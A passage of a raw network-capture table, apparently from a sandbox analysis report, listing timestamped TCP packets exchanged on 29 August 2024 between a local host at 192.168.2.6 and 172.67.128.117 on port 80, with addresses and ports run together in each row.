                                    Aug 29, 2024 12:02:35.280114889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280127048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280138016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280143023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280143023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280143976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280155897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280158997 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280168056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280179024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280185938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280200005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280215979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280245066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280253887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280266047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280278921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280289888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280294895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280313015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280347109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280487061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280503035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280514956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280522108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280527115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280539989 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280544043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280558109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280564070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280594110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280739069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280756950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280766964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280780077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280780077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280791044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280802011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280808926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280814886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.280842066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.280862093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281052113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281063080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281075001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281086922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281090975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281097889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281117916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281128883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281131029 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281141996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281153917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281155109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281164885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281173944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281177998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281196117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281197071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281208038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281219959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281228065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281235933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281248093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281260014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281271935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281274080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281284094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281295061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281301975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281307936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281321049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281323910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281332970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281341076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281342983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281371117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281383038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281394005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281394005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281404972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281419039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281431913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281465054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281465054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281480074 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281639099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281651020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281666994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281676054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281680107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281692028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281697035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281703949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281716108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281717062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281753063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281766891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281770945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281806946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281902075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281913042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281924009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281935930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281939983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281949043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281964064 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.281965971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281980038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.281989098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282013893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282560110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282579899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282598972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282618999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282644033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282646894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282660007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282670975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282682896 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282706976 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282788992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282809019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282819986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282831907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282834053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282860994 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282883883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282927036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282938957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.282964945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.282979012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283000946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283013105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283025026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283035994 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283052921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283068895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283096075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283107996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283132076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283148050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283212900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283225060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283237934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283248901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283251047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283277035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283308029 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283359051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283379078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283390999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283404112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283415079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283426046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283432007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283441067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283571959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283617973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283617973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283643007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283682108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283694029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283704996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283715010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283726931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283735991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283747911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283759117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283770084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283797979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283824921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283835888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283848047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283859015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283870935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283885956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283886909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.283904076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.283935070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.370707989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370733023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370745897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370758057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370769978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370783091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370796919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370809078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370834112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.370847940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370862961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370876074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370903969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.370934010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.370975971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.370992899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371004105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371016979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371022940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371030092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371057034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371083975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371099949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371117115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371129036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371140957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371150017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371166945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371205091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371234894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371248007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371267080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371275902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371279955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371289968 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371323109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371419907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371432066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371444941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371458054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371469021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371470928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371481895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371496916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371506929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371521950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371560097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371597052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371736050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371752024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371766090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371778011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371779919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371793032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371798038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371808052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371820927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371834040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371840000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371855974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371864080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371864080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371869087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371881962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371896029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371898890 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371908903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371920109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371928930 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371932030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.371943951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371980906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.371989012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372004032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372016907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372028112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372028112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372040987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372061014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372061968 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372086048 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372132063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372150898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372164965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372175932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372195005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372235060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372250080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372261047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372272015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372283936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372299910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372303009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372328997 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372348070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372457981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372468948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372487068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372498989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372505903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372513056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372544050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372562885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372622013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372636080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372646093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372657061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372677088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372678041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372693062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372700930 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372705936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372715950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.372720957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.372761011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373172998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373184919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373195887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373225927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373249054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373301029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373312950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373325109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373344898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373348951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373356104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373385906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373420954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373447895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373457909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373476028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373486042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373486996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373517990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373518944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373528957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373539925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373550892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373579979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373579979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373595953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373616934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373627901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373670101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373819113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373835087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373850107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373862982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373862982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373878002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373889923 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373892069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373910904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373922110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373930931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373934984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373944998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373956919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373966932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.373969078 CEST8049717172.67.128.117192.168.2.6
